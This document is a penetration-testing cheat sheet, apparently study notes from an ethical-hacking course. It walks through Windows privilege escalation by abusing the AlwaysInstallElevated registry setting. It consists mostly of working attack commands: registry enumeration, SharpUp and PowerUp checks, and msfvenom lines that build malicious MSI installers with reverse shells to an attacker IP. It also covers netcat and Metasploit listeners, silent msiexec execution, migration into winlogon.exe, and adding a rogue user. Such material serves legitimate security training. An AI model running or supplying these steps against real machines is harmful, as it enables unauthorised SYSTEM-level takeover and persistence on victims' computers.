Always Installed Elevated exploitation

Target requirements

• The target needs to have those values in the registry:

  • In Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1

  • In Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer with the AlwaysInstallElevated set to 1 This means that installation packages are installed with elevated privileges

Enumerate with cmd

• Type reg query HKLM\Software\Policies\Microsoft\Windows\Installer in a cmd prompt should be set to 1

• Type reg query HKCU\Software\Policies\Microsoft\Windows\Installer should be one as well

Exploitation

• You should have a shell with covenant, metasploit or netcat or an access to the target. We will use Covenant and Metasploit here.

Covenant

Enumerate with SharpUp audit

• In your shell type SharpUp audit

• In the results you should see this:

  === AlwaysInstallElevated Registry Keys ===
  
    HKLM:    1
    HKCU:    1

Enumerate with powerup

• In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it here )

• Click on execute

• Type powershell invoke-allchecks in your shell

• We should see this

  [*] Checking for AlwaysInstallElevated registry key...
  AbuseFunction : Write-UserAddMSI

Exploitation

• generate a payload with msfvenom msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi between the quotes copy and paste an encoded launcher.

• Upload your file in the target using Upload command from covenant (type Upload and enter, file the file path for the target and browse to the file in your attack machine)

• run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi

• We should get a prompt for another reverse shell in our grunts as an elevated user

  > whoami
  NT AUTHORITY\SYSTEM

Exploitation with powerup

• powershell -ep bypass

• . .\PowerUp.ps1

• Write-UserAddMSI

• It will set up a malicious MSI called UserAdd

• And we will be able to add a user

• Our user has been added

Metasploit

• Interact with a session you should already have from initial foothold sessions -i num-of-session

Enumerate

• Launch run post/multi/recon/local_exploit_suggester

• You should see: - exploit/windows/local/always_install_elevated: The target is vulnerable.

Exploitation

• Background your session with ctrl z

• Type use exploit/windows/local/always_install_elevated

• set session to the number of the session you have on your target

• type exploit -j

• list the sessions you should have another one running as authority system

• type ps and look for a process under session 1 so that we can migrate to it

• We can use winlogon.exe 620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe

• Migrate to it using migrate PID-number in our example it is going to be migrate 520

OR

• msfconsole

• use multi/handler

• set payload windows/meterpreter/reverse_tcp

• set lhost your-Kali-IP

• run

• In another console tab msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi

• Get the generated msi in your target (python server -> browser from target)

• In your target Place setup.msi in a folder where you have write access

• Open command prompt and type: msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi

• You should get an elevated shell in msfconsole

Other way

• Generate a malicious MSI package msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi

• Set up a listener rlwrap nc -lnvp CHOSEN-PORT

• Upload it to the target and execute it from the cmd msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart

• You should get an elevated shell

Resources

TCM Security Academyacademy.tcm-sec.com

TCM security Academy - Movement pivoting and persistence for pentesters and ethical hacker